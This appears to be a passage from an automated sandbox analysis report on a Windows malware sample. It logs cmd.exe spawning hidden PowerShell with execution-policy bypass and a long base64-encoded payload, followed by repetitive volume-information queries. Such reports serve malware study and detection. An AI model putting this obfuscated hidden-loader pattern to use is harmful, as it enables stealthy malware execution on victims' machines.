yyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgntglyauhybmtldevdz3neafdzzfc2z3fzwm41chhwakuzuxrolznnqjizyz0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj3ird1fpui9qyudmzwntvk8voglrdfe9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gb2zldgeojhbhcmftx3zhcil7culfwcanjgpocnvupu5ldy1pymply3qgu3lzdgvtlklplk1bqknlbufcq29yqujdevnbqkn0ckfcq2vhqujdbsgsjhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgpidxjppu5ldy1pymply3qgu3lzdgvtlklplkfcq01bqknlqujdbufcq29bqknyqujdeufcq1nbqkn0qujdckfcq2vbqknhqujdbufcqzsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckz2l5b2g9tmv3lu9iamvjdcbtexn0zw0usu8uq0fcq29tqujdchjbqknlqujdc3nbqknpb0fcq24uqujdr1pbqknpcefcq1n0qujdcmvbqknhbufcqygkamhydw4siftjty5dqujdb21bqknwckfcq2vzqujdc2lbqknvbkfcqy5db0fcq21wqujdcmvbqknzc0fcq2lbqknvqujdbkfcq01vzgvdojpequjdzufcq2nbqknvbxbbqknyzufcq3nzktsnlljlcgxhy2uoj0fcqycsiccnktsjjgdpew9olknvchlubygkamj1cmkpowkkz2l5b2gurglzcg9zzsgpowkkamhydw4urglzcg9zzsgpowkkamj1cmkurglzcg9zzsgpowkkamj1cmkuvg9bcnjhesgpo31mdw5jdglvbibsahl4csgkcgfyyw1fdmfylcrwyxjhbtjfdmfykxsjsuvyicckehvweno9w1n5c3rlbs5squjdzufcq2zsqujdzwn0qujdaw9bqknulkfcq0f
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('dhj5e2llecaokgllecaokcd3yndoagjyam5rcwvucgvpd2j3aghicmpua3flbnbld3did2hoynjqbmtxzw5wzxj3yndoagjyam5rcwvucgugd2j3aghicmpua3flbnbllxdid2hoynjqbmtxzw5wzvv3yndoagjyam5rcwvucgvzd2j3aghicmpua3flbnblzxdid2hoynjqbmtxzw5wzuj3yndoagjyam5rcwvucgvhd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvjd2j3aghicmpua3flbnbluhdid2hoynjqbmtxzw5wzwf3yndoagjyam5rcwvucgvyd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvud2j3aghicmpua3flbnblz3did2hoynjqbmtxzw5wzsaid2j3aghicmpua3flbnblahdid2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucgv0d2j3aghicmpua3flbnblchdid2hoynjqbmtxzw5wzxn3yndoagjyam5rcwvucgu6d2j3aghicmpua3flbnbll3did2hoynjqbmtxzw5wzs93yndoagjyam5rcwvucguwd2j3aghicmpua3flbnblehdid2hoynjqbmtxzw5wztb3yndoagjyam5rcwvucguud2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucguvd2j3aghicmpua3flbnblohdid2hoynjqbmtxzw5wzut3yndoagjyam5rcwvucgv1d2j3aghicmpua3flbnblvndid2hoynjqbmtxzw5wzs53yndoagjyam5rcwvucgvwd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wztf3yndoagjyam5rcwvucguijykuumvwbgfjzsgnd2j3aghicmpua3flbnbljywnjykpks5db250zw50ksatrxjyb3jby3rpb24gu2lszw50bhldb250aw51zx1jyxrjaht9o2z1bmn0aw9uihb0amtzkcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgntglyauhybmtldevdz3neafdzzfc2z3fzwm41chhwakuzuxrolznnqjizyz0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj3ird1fpui9qyudmzwntvk8voglrdfe9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gb2zldgeojhbhcmftx3zhcil7culfwcanjgpocnvupu5ldy1pymply3qgu3lzdgvtlklplk1bqknlbufcq29yqujdevnbqkn0ckfcq2vhqujdbsgsjhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgpidxjppu5ldy1pymply3qgu3lzdgvtlklplkfcq01bqknlqujdbufcq29bqknyqujdeufcq1nbqkn0qujdckfcq2vbqknhqujdbufcqzsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckz2l5b2g9tmv3lu9iamvjdcbtexn0zw0usu8uq0fcq29tqujdchjbqknlqujdc3nbqknpb0fcq24uqujdr1pbqknpcefcq1n0qujdcmvbqknhbufcqygkamhydw4siftjty5dqujdb21bqknwckfcq2vzqujdc2lbqknvbkfcqy5db0fcq21wqujdcmvbqknzc0fcq2lbqknvqujdbkfcq01vzgvdojpequjdzufcq2nbqknvbxbbqknyzufcq3nzktsnlljlcgxhy2uoj0fcqycsiccnktsjjgdpew9olknvchlubygkamj1cmkpowkkz2l5b2gurglzcg9zzsgpowkkamhydw4urglzcg9zzsgpowkkamj1cmkurglzcg9zzsgpowkkamj1cmkuvg9bcnjhesgpo31mdw5jdglvbibsahl4csgkcgfyyw1fdmfylcrwyxjhbtjfdmfykxsjsuvyicckehvweno9w1n5c3rlbs5squjdzufcq2zsqujdzwn0qujdaw9bqknulkfcq0f
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('dhj5e2llecaokgllecaokcd3yndoagjyam5rcwvucgvpd2j3aghicmpua3flbnbld3did2hoynjqbmtxzw5wzxj3yndoagjyam5rcwvucgugd2j3aghicmpua3flbnbllxdid2hoynjqbmtxzw5wzvv3yndoagjyam5rcwvucgvzd2j3aghicmpua3flbnblzxdid2hoynjqbmtxzw5wzuj3yndoagjyam5rcwvucgvhd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvjd2j3aghicmpua3flbnbluhdid2hoynjqbmtxzw5wzwf3yndoagjyam5rcwvucgvyd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvud2j3aghicmpua3flbnblz3did2hoynjqbmtxzw5wzsaid2j3aghicmpua3flbnblahdid2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucgv0d2j3aghicmpua3flbnblchdid2hoynjqbmtxzw5wzxn3yndoagjyam5rcwvucgu6d2j3aghicmpua3flbnbll3did2hoynjqbmtxzw5wzs93yndoagjyam5rcwvucguwd2j3aghicmpua3flbnblehdid2hoynjqbmtxzw5wztb3yndoagjyam5rcwvucguud2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucguvd2j3aghicmpua3flbnblohdid2hoynjqbmtxzw5wzut3yndoagjyam5rcwvucgv1d2j3aghicmpua3flbnblvndid2hoynjqbmtxzw5wzs53yndoagjyam5rcwvucgvwd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wztf3yndoagjyam5rcwvucguijykuumvwbgfjzsgnd2j3aghicmpua3flbnbljywnjykpks5db250zw50ksatrxjyb3jby3rpb24gu2lszw50bhldb250aw51zx1jyxrjaht9o2z1bmn0aw9uihb0amtzkcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgntglyauhybmtldevdz3neafdzzfc2z3fzwm41chhwakuzuxrolznnqjizyz0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj3ird1fpui9qyudmzwntvk8voglrdfe9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gb2zldgeojhbhcmftx3zhcil7culfwcanjgpocnvupu5ldy1pymply3qgu3lzdgvtlklplk1bqknlbufcq29yqujdevnbqkn0ckfcq2vhqujdbsgsjhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgpidxjppu5ldy1pymply3qgu3lzdgvtlklplkfcq01bqknlqujdbufcq29bqknyqujdeufcq1nbqkn0qujdckfcq2vbqknhqujdbufcqzsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckz2l5b2g9tmv3lu9iamvjdcbtexn0zw0usu8uq0fcq29tqujdchjbqknlqujdc3nbqknpb0fcq24uqujdr1pbqknpcefcq1n0qujdcmvbqknhbufcqygkamhydw4siftjty5dqujdb21bqknwckfcq2vzqujdc2lbqknvbkfcqy5db0fcq21wqujdcmvbqknzc0fcq2lbqknvqujdbkfcq01vzgvdojpequjdzufcq2nbqknvbxbbqknyzufcq3nzktsnlljlcgxhy2uoj0fcqycsiccnktsjjgdpew9olknvchlubygkamj1cmkpowkkz2l5b2gurglzcg9zzsgpowkkamhydw4urglzcg9zzsgpowkkamj1cmkurglzcg9zzsgpowkkamj1cmkuvg9bcnjhesgpo31mdw5jdglvbibsahl4csgkcgfyyw1fdmfylcrwyxjhbtjfdmfykxsjsuvyicckehvweno9w1n5c3rlbs5squjdzufcq2zsqujdzwn0qujdaw9bqknulkfcq0f
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('dhj5e2llecaokgllecaokcd3yndoagjyam5rcwvucgvpd2j3aghicmpua3flbnbld3did2hoynjqbmtxzw5wzxj3yndoagjyam5rcwvucgugd2j3aghicmpua3flbnbllxdid2hoynjqbmtxzw5wzvv3yndoagjyam5rcwvucgvzd2j3aghicmpua3flbnblzxdid2hoynjqbmtxzw5wzuj3yndoagjyam5rcwvucgvhd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvjd2j3aghicmpua3flbnbluhdid2hoynjqbmtxzw5wzwf3yndoagjyam5rcwvucgvyd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvud2j3aghicmpua3flbnblz3did2hoynjqbmtxzw5wzsaid2j3aghicmpua3flbnblahdid2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucgv0d2j3aghicmpua3flbnblchdid2hoynjqbmtxzw5wzxn3yndoagjyam5rcwvucgu6d2j3aghicmpua3flbnbll3did2hoynjqbmtxzw5wzs93yndoagjyam5rcwvucguwd2j3aghicmpua3flbnblehdid2hoynjqbmtxzw5wztb3yndoagjyam5rcwvucguud2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucguvd2j3aghicmpua3flbnblohdid2hoynjqbmtxzw5wzut3yndoagjyam5rcwvucgv1d2j3aghicmpua3flbnblvndid2hoynjqbmtxzw5wzs53yndoagjyam5rcwvucgvwd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wztf3yndoagjyam5rcwvucguijykuumvwbgfjzsgnd2j3aghicmpua3flbnbljywnjykpks5db250zw50ksatrxjyb3jby3rpb24gu2lszw50bhldb250aw51zx1jyxrjaht9o2z1bmn0aw9uihb0amtzkcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgntglyauhybmtldevdz3neafdzzfc2z3fzwm41chhwakuzuxrolznnqjizyz0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj3ird1fpui9qyudmzwntvk8voglrdfe9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gb2zldgeojhbhcmftx3zhcil7culfwcanjgpocnvupu5ldy1pymply3qgu3lzdgvtlklplk1bqknlbufcq29yqujdevnbqkn0ckfcq2vhqujdbsgsjhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgpidxjppu5ldy1pymply3qgu3lzdgvtlklplkfcq01bqknlqujdbufcq29bqknyqujdeufcq1nbqkn0qujdckfcq2vbqknhqujdbufcqzsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckz2l5b2g9tmv3lu9iamvjdcbtexn0zw0usu8uq0fcq29tqujdchjbqknlqujdc3nbqknpb0fcq24uqujdr1pbqknpcefcq1n0qujdcmvbqknhbufcqygkamhydw4siftjty5dqujdb21bqknwckfcq2vzqujdc2lbqknvbkfcqy5db0fcq21wqujdcmvbqknzc0fcq2lbqknvqujdbkfcq01vzgvdojpequjdzufcq2nbqknvbxbbqknyzufcq3nzktsnlljlcgxhy2uoj0fcqycsiccnktsjjgdpew9olknvchlubygkamj1cmkpowkkz2l5b2gurglzcg9zzsgpowkkamhydw4urglzcg9zzsgpowkkamj1cmkurglzcg9zzsgpowkkamj1cmkuvg9bcnjhesgpo31mdw5jdglvbibsahl4csgkcgfyyw1fdmfylcrwyxjhbtjfdmfykxsjsuvyicckehvweno9w1n5c3rlbs5squjdzufcq2zsqujdzwn0qujdaw9bqknulkfcq0f
                          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
